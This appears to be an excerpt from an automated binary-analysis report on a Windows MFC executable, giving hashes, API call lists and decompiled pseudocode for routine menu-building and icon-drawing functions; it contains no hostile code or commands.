Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #6194$Rect$#2860#3293#4333#6696ClientCurrentObjectOffset
String ID:
API String ID: 3146137074-0
Opcode ID: 8c24e05da7ebcd5b731e41e6515ed9282f83d0a5bf4a994b2aecb3e2f651257d
Instruction ID: a4f40fa0bbddb9cbe517a1fde68f42a2bd1107f6880ad88326a1515340d88d68
Opcode Fuzzy Hash: 8c24e05da7ebcd5b731e41e6515ed9282f83d0a5bf4a994b2aecb3e2f651257d
Instruction Fuzzy Hash: 07414A35700205AFCB15EF95C895EBEBBBAFF88700F04411EFA0697291DB34A941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041467B, Relevance: 15.1, APIs: 10, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0041467B(signed int __ebx, intOrPtr __ecx, void* __fp0) {
				signed char _t59;
				signed int _t62;
				int _t64;
				int _t65;
				signed int _t78;
				char _t79;
				signed int _t82;
				int _t87;
				intOrPtr* _t90;
				char _t101;
				intOrPtr _t103;
				CHAR* _t106;
				int _t107;
				void* _t109;
				void* _t120;

				_t120 = __fp0;
				_t78 = __ebx;
				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t106 = 0;
				_t103 = __ecx;
				if( *(_t109 + 0x10) != 0) {
					__eflags =  *(_t109 + 0xc) & 0x00000100;
					if(( *(_t109 + 0xc) & 0x00000100) == 0) {
						_t7 = _t109 + 0xc;
						 *_t7 =  *(_t109 + 0xc) | 0x00000100;
						__eflags =  *_t7;
					}
					_t59 =  *(_t109 + 0xc);
				} else {
					_t59 =  *(_t109 + 0xc) & 0x00000400 | 0x00000009;
					 *(_t109 + 0xc) = _t59;
				}
				if((_t59 & 0x00000010) != 0) {
					_push( *(_t109 + 0x10));
					_push( *0x4421a0);
					L00426582();
					_push( *(_t109 + 0x10));
					_t59 =  *(_t103 + 0x24);
					_push(_t59);
					L00426582();
				}
				_push(0x24);
				L00425E38();
				 *(_t109 - 0x10) = _t59;
				 *(_t109 - 4) = _t106;
				if(_t59 != _t106) {
					_t106 = L00401D7F(_t59);
				}
				_push(_t78);
				_t79 = _t78 | 0xffffffff;
				_push(_t106);
				_push( *((intOrPtr*)(_t103 + 0x10)));
				 *(_t109 - 4) = _t79;
				L00426582();
				L004013DE(_t106,  *(_t109 + 8));
				_t101 = 0;
				_t106[0xc] = _t79;
				_t106[4] = _t79;
				if( *(_t109 + 0x14) < 0) {
					_t62 =  *0x4421b8;
					 *(_t109 + 0x14) = _t79;
					__eflags = _t62;
					if(__eflags > 0) {
						_t90 =  *0x4421b4;
						while(1) {
							__eflags =  *_t90 -  *(_t109 + 0x10);
							if(__eflags == 0) {
								break;
							}
							_t101 = _t101 + 1;
							_t90 = _t90 + 4;
							__eflags = _t101 - _t62;
							if(__eflags < 0) {
								continue;
							} else {
							}
							goto L21;
						}
						 *(_t109 + 0x14) = _t101;
					}
					L21:
					_t106[8] =  *(_t109 + 0x14);
				} else {
					L00425F8E();
					_t82 = 1;
					 *(_t109 + 8) =  *(_t109 + 8) & 0x00000000;
					_push(_t109 + 8);
					_push( *(_t109 + 0x14));
					 *(_t109 - 4) = _t82;
					_push( *(_t109 + 0x10));
					E00401FBE();
					if(_t106[0x1c] != 0) {
						L004266BA();
						_t106[0x1c] = _t106[0x1c] & 0x00000000;
					}
					_push(_t82);
					_push(_t82);
					_push(0xff);
					_push( *0x440d0c);
					_push( *0x440d08);
					L00426000();
					if(E00401140(_t103, _t120, _t109 - 0x14,  *(_t109 + 0x14)) != 0) {
						_push( *(_t109 + 0x10));
						_push( *(_t109 + 8));
						_push(_t109 - 0x14);
						_t106[8] = L00401294(_t103);
					}
					 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
					L00425FB2();
				}
				_t87 =  *(_t109 + 0x10);
				_t64 =  *(_t109 + 0xc);
				_t106[0x10] = _t64;
				_t106[0x14] = _t87;
				_t65 = AppendMenuA( *(_t103 + 4), _t64, _t87, _t106);
				_t119 =  *((intOrPtr*)(_t103 + 0x50));
				_t107 = _t65;
				if( *((intOrPtr*)(_t103 + 0x50)) != 0) {
					E00401456(_t103, _t119);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
				return _t107;
			}

0x0041467b
0x0041467b
0x00414680
0x00414685
0x00414686
0x00414688
0x0041468e
0x00414690
0x004146a7
0x004146aa
0x004146ac
0x004146ac
0x004146ac
0x004146ac
0x004146af
0x00414692
0x0041469a
0x0041469d
0x0041469d
0x004146b4
0x004146b6
0x004146c3
0x004146c4
0x004146c9
0x004146cc
0x004146d2
0x004146d3
0x004146d3
0x004146d8
0x004146da
0x004146e0
0x004146e5
0x004146e8
0x004146f1
0x004146f1
0x004146f9
0x004146fa
0x004146fd
0x004146fe
0x004146ff
0x00414702
0x0041470c
0x00414711
0x00414713
0x00414719
0x0041471c
0x004147a4
0x004147a9
0x004147ac
0x004147ae
0x004147b0
0x004147b6
0x004147b8
0x004147bb
0x00000000
0x00000000
0x004147bd
0x004147be
0x004147c1
0x004147c3
0x00000000
0x00000000
0x004147c5
0x00000000
0x004147c3
0x004147c7
0x004147c7
0x004147ca
0x004147cd
0x00414722
0x00414725
0x0041472f
0x00414730
0x00414734
0x00414737
0x0041473a
0x0041473d
0x00414740
0x0041474a
0x0041474c
0x00414751
0x00414751
0x00414755
0x00414756
0x00414757
0x0041475f
0x00414765
0x0041476b
0x00414780
0x00414782
0x0041478a
0x0041478d
0x00414793
0x00414793
0x00414796
0x0041479d
0x0041479d
0x004147d0
0x004147d3
0x004147d9
0x004147df
0x004147e2
0x004147e8
0x004147ec
0x004147ef
0x004147f3
0x004147f3
0x004147ff
0x00414807

APIs

_EH_prolog.MSVCRT ref: 00414680
#5860.MFC42(?,?), ref: 004146C4
#5860.MFC42(?,?,?,?), ref: 004146D3
#823.MFC42(00000024), ref: 004146DA
#5860.MFC42(?,00000000), ref: 00414702
#384.MFC42(?,?,00000000), ref: 00414725
#2408.MFC42(?,?,00000000), ref: 0041474C
#2096.MFC42(000000FF,00000001,00000001,?,?,00000000), ref: 0041476B
#686.MFC42(000000FF,00000001,00000001,?,?,00000000), ref: 0041479D
AppendMenuA.USER32 ref: 004147E2

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5860$#2096#2408#384#686#823AppendH_prologMenu
String ID:
API String ID: 2741775810-0
Opcode ID: adb4448f827b1fd95db0a44adc16dfe987616fa4bd6aa43f07ce7e877c148775
Instruction ID: 60ea6cd9b20205eab0a6ca5c541bc258371245790efc30f4de00da3725f9e180
Opcode Fuzzy Hash: adb4448f827b1fd95db0a44adc16dfe987616fa4bd6aa43f07ce7e877c148775
Instruction Fuzzy Hash: D651B37460020AAFCB14DF65D941AEE77B5FF44318F10852EF926A7290D738DE50CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040101E, Relevance: 15.1, APIs: 10, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040101E() {
				struct HICON__** _t44;
				struct HDC__* _t66;
				struct HDC__* _t75;
				void* _t77;

				L004269E6();
				_t75 =  *(_t77 + 8);
				_push( *((intOrPtr*)(_t75 + 0x18)));
				L00425FD0();
				 *(_t77 + 8) = E00429A7A;
				if(( *(_t75 + 0x10) & 0x00000001) != 0 && ( *(_t75 + 0xc) & 0x00000003) != 0) {
					_push(GetSysColor(0xd));
					L00425FC4();
					asm("sbb eax, eax");
					FillRect( *( *(_t77 + 8) + 4), _t75 + 0x1c,  ~(_t77 - 0x14) &  *(_t77 - 0x10));
					 *(_t77 - 0x14) = 0x42c514;
					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
					L00425FA6();
					 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				}
				if(( *(_t75 + 0x10) & 0x00000001) == 0 && ( *(_t75 + 0xc) & 0x00000002) != 0) {
					_push(0xffffff);
					L00425FC4();
					asm("sbb eax, eax");
					FillRect( *( *(_t77 + 8) + 4), _t75 + 0x1c,  ~(_t77 - 0x1c) &  *(_t77 - 0x18));
					 *(_t77 - 0x1c) = 0x42c514;
					 *(_t77 - 4) = 1;
					L00425FA6();
				}
				_t44 =  *(_t75 + 0x2c);
				if(_t44 != 0 && _t44 != 0xffffffff) {
					_t66 =  *(_t77 + 8);
					if(_t66 != 0) {
						_t66 =  *(_t66 + 4);
					}
					_t44 = DrawIconEx(_t66,  *(_t75 + 0x1c) + 1,  *((intOrPtr*)(_t75 + 0x20)) + 1,  *_t44, 0x20, 0x20, 0, 0, 3);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t44;
			}

0x0041da2c
0x0041da36
0x0041da3a
0x0041da3d
0x0041da4c
0x0041da54
0x0041da64
0x0041da68
0x0041da72
0x0041da82
0x0041da84
0x0041da87
0x0041da8e
0x0041da93
0x0041da93
0x0041da9b
0x0041daa3
0x0041daab
0x0041dab5
0x0041dac5
0x0041dac7
0x0041dacd
0x0041dad4
0x0041dad4
0x0041dad9
0x0041dade
0x0041dae5
0x0041daea
0x0041daec
0x0041daec
0x0041db06
0x0041db06
0x0041db12
0x0041db1a

APIs

_EH_prolog.MSVCRT ref: 0041DA2C
#2859.MFC42(?), ref: 0041DA3D
GetSysColor.USER32(0000000D), ref: 0041DA5E
#283.MFC42(00000000), ref: 0041DA68
FillRect.USER32 ref: 0041DA82
#2414.MFC42 ref: 0041DA8E
#283.MFC42(00FFFFFF,?), ref: 0041DAAB
FillRect.USER32 ref: 0041DAC5
#2414.MFC42 ref: 0041DAD4
DrawIconEx.USER32 ref: 0041DB06

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#283FillRect$#2859ColorDrawH_prologIcon
String ID:
API String ID: 1359844443-0
Opcode ID: 3ef96bd81a55d4b4a2c5f4b55e89dae9afd977eac29cbb503ba0a2493fdc7985
Instruction ID: d8ac52898c7c74e377922789c36638744392d87304fffd9b92a9b23d74f8a08a
Opcode Fuzzy Hash: 3ef96bd81a55d4b4a2c5f4b55e89dae9afd977eac29cbb503ba0a2493fdc7985
Instruction Fuzzy Hash: 5A317E71A00609AFCB21DFA4C946FEEBBB8EF44304F14821AA516972D1D778AA49CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040141F, Relevance: 15.1, APIs: 10, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040141F() {
				struct HICON__** _t44;
				struct HDC__* _t66;
				struct HDC__* _t75;
				void* _t77;

				L004269E6();
				_t75 =  *(_t77 + 8);
				_push( *((intOrPtr*)(_t75 + 0x18)));
				L00425FD0();
				 *(_t77 + 8) = E00429A60;
				if(( *(_t75 + 0x10) & 0x00000001) != 0 && ( *(_t75 + 0xc) & 0x00000003) != 0) {
					_push(GetSysColor(0xd));
					L00425FC4();
					asm("sbb eax, eax");
					FillRect( *( *(_t77 + 8) + 4), _t75 + 0x1c,  ~(_t77 - 0x14) &  *(_t77 - 0x10));
					 *(_t77 - 0x14) = 0x42c514;
					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
					L00425FA6();
					 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
				}
				if(( *(_t75 + 0x10) & 0x00000001) == 0 && ( *(_t75 + 0xc) & 0x00000002) != 0) {
					_push(0xffffff);
					L00425FC4();
					asm("sbb eax, eax");
					FillRect( *( *(_t77 + 8) + 4), _t75 + 0x1c,  ~(_t77 - 0x1c) &  *(_t77 - 0x18));
					 *(_t77 - 0x1c) = 0x42c514;
					 *(_t77 - 4) = 1;
					L00425FA6();
				}
				_t44 =  *(_t75 + 0x2c);
				if(_t44 != 0 && _t44 != 0xffffffff) {
					_t66 =  *(_t77 + 8);
					if(_t66 != 0) {
						_t66 =  *(_t66 + 4);
					}
					_t44 = DrawIconEx(_t66,  *(_t75 + 0x1c) + 1,  *((intOrPtr*)(_t75 + 0x20)) + 1,  *_t44, 0x10, 0x10, 0, 0, 3);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t44;
			}

0x0041d7c2
0x0041d7cc
0x0041d7d0
0x0041d7d3
0x0041d7e2
0x0041d7ea
0x0041d7fa
0x0041d7fe
0x0041d808
0x0041d818
0x0041d81a
0x0041d81d
0x0041d824
0x0041d829
0x0041d829
0x0041d831
0x0041d839
0x0041d841
0x0041d84b
0x0041d85b
0x0041d85d
0x0041d863
0x0041d86a
0x0041d86a
0x0041d86f
0x0041d874
0x0041d87b
0x0041d880
0x0041d882
0x0041d882
0x0041d89c
0x0041d89c
0x0041d8a8
0x0041d8b0

APIs

_EH_prolog.MSVCRT ref: 0041D7C2
#2859.MFC42(?), ref: 0041D7D3
GetSysColor.USER32(0000000D), ref: 0041D7F4
#283.MFC42(00000000), ref: 0041D7FE
FillRect.USER32 ref: 0041D818
#2414.MFC42 ref: 0041D824
#283.MFC42(00FFFFFF,?), ref: 0041D841
FillRect.USER32 ref: 0041D85B
#2414.MFC42 ref: 0041D86A
DrawIconEx.USER32 ref: 0041D89C

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#283FillRect$#2859ColorDrawH_prologIcon
String ID:
API String ID: 1359844443-0
Opcode ID: c6044c1eec2a46b41084b7a84f1abfe6910a235e4cc170e8048633cfdac6ed69
Instruction ID: ab45d820cc92480ee3b57cba2a17c5d307e4882e536670a6e08578ace0ca36d5
Opcode Fuzzy Hash: c6044c1eec2a46b41084b7a84f1abfe6910a235e4cc170e8048633cfdac6ed69
Instruction Fuzzy Hash: 2131B071A00208AFC720DF65C946FEABBB4AF04304F14862AA526932D1D778EA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040134D, Relevance: 15.1, APIs: 10, Instructions: 60
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040134D(void* __ecx) {
				CHAR* _t18;
				struct HMENU__* _t20;
				int _t22;
				void* _t33;
				struct HMENU__* _t36;
				void* _t39;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t33 = __ecx;
				_t18 = GetMenuItemCount( *(__ecx + 4));
				 *(_t39 - 0x14) = _t18;
				L00425E08();
				_t22 = 0;
				 *(_t39 - 4) = 0;
				if( *(_t39 - 0x14) <= 0) {
					L5:
					_t36 = 0;
				} else {
					while(1) {
						L0042601E();
						_t18 = GetMenuStringA( *(_t33 + 4), _t22, _t18, 0x100, 0x100);
						L00426018();
						__imp___mbscmp( *((intOrPtr*)(_t39 - 0x10)),  *((intOrPtr*)(_t39 + 8)), 0xffffffff, 0x400);
						if(_t18 == 0) {
							break;
						}
						_t22 = _t22 + 1;
						if(_t22 <  *(_t39 - 0x14)) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t20 = GetSubMenu( *(_t33 + 4), _t22);
					_push(_t20);
					L0042635A();
					_t36 = _t20;
				}
				L6:
				 *(_t39 - 4) =  *(_t39 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t39 - 0xc));
				return _t36;
			}

0x0041881f
0x00418824
0x00418825
0x00418829
0x0041882e
0x00418837
0x0041883a
0x0041883f
0x00418844
0x00418847
0x0041888a
0x0041888a
0x00418849
0x0041884e
0x00418858
0x00418862
0x0041886d
0x00418878
0x00418882
0x00000000
0x00000000
0x00418884
0x00418888
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00418888
0x004188af
0x004188b5
0x004188b6
0x004188bb
0x004188bb
0x0041888c
0x0041888c
0x00418893
0x004188a0
0x004188a8

APIs

_EH_prolog.MSVCRT ref: 0041881F
GetMenuItemCount.USER32 ref: 0041882E
#540.MFC42 ref: 0041883A
#2915.MFC42(00000100,00000100,00000400), ref: 00418858
GetMenuStringA.USER32(?,00000000,00000000,00000100,00000100), ref: 00418862
#5572.MFC42(000000FF), ref: 0041886D
_mbscmp.MSVCRT ref: 00418878
#800.MFC42(00000000), ref: 00418893
GetSubMenu.USER32 ref: 004188AF
#2863.MFC42(00000000), ref: 004188B6

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$#2863#2915#540#5572#800CountH_prologItemString_mbscmp
String ID:
API String ID: 999429702-0
Opcode ID: 656e55db0a4d7ed9a7694a65d957f9bf37dfe0cd3d7185d01875cf39855b80a8
Instruction ID: d09d6cd3e564bc30811780547d513705d2741ff88b998f2c9328fc9034769300
Opcode Fuzzy Hash: 656e55db0a4d7ed9a7694a65d957f9bf37dfe0cd3d7185d01875cf39855b80a8
Instruction Fuzzy Hash: 491191B5A00126AFCB04EFA1DD469EEF738FF05364B60413EF126A21A1DB345E05DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040908A, Relevance: 15.0, APIs: 10, Instructions: 41COMMON

Download Yara Rule

APIs

#1997.MFC42(00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040909B
#4160.MFC42(0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090AA
#2818.MFC42(?,?,0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090BC
#1200.MFC42(?,00000010,00000000), ref: 004090CA
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090D9
#641.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090E8
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090F4
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00409100
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040910C
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00409118
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00409124
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040912F
#798.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040913B

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#1200#1997#2818#4160#641#798
String ID:
API String ID: 1216907108-0
Opcode ID: 792b4d5c6f0f479e755c8854c95ff7656436eca129730b48e98cc40e2c2f9be7
Instruction ID: db976a60910eaccf231c8d6ff9946f9b4147bf62612f631616b468fdfd362d8f
Opcode Fuzzy Hash: 792b4d5c6f0f479e755c8854c95ff7656436eca129730b48e98cc40e2c2f9be7
Instruction Fuzzy Hash: DA117030909698DEDB05EBE5E1593DCFBB09F24318F90809EC00133292DBB81B4DDA26

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2B2, Relevance: 15.0, APIs: 10, Instructions: 41COMMON

Download Yara Rule

APIs

#1997.MFC42(00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A2C3
#4160.MFC42(0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A2D2
#2818.MFC42(?,?,0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A2E4
#1200.MFC42(?,00000010,00000000), ref: 0040A2F2
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A301
#641.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A310
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A31C
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A328
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A334
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A340
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A34C
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A357
#798.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A363

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#1200#1997#2818#4160#641#798
String ID:
API String ID: 1216907108-0
Opcode ID: 792b4d5c6f0f479e755c8854c95ff7656436eca129730b48e98cc40e2c2f9be7
Instruction ID: ebdc20850a64f3b3d3d70123787d024246890fbd0b39435388c617a3b8825462
Opcode Fuzzy Hash: 792b4d5c6f0f479e755c8854c95ff7656436eca129730b48e98cc40e2c2f9be7
Instruction Fuzzy Hash: 7C117034909698DEDB05EBE5E1593DCFBB09F24318F90809EC00133292DBB81B5DDA26

Uniqueness

Uniqueness Score: -1.00%

Function 0041106B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411070
#4083.MFC42(0042DEE8), ref: 004110E2
#3986.MFC42(?,00000000,00000001), ref: 004111A3
#3986.MFC42(?,00000000,00000001), ref: 004111E1
#500.MFC42(?,?,?), ref: 004111ED
#772.MFC42(4B,?,?,?), ref: 0041123E

Strings

4B, xrefs: 004111FD, 00411200

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3986$#4083#500#772H_prolog
String ID: 4B
API String ID: 2485564967-455405905
Opcode ID: 35ad4cb93f39cbaacf48d54ef44830e6ac1c5ba5036122b8709c1b00b31481ab
Instruction ID: 9dcc68cf8fa3d86763cfb2ecb3da74f7fe6d65efe395edb6884aca115c7b9cbb
Opcode Fuzzy Hash: 35ad4cb93f39cbaacf48d54ef44830e6ac1c5ba5036122b8709c1b00b31481ab
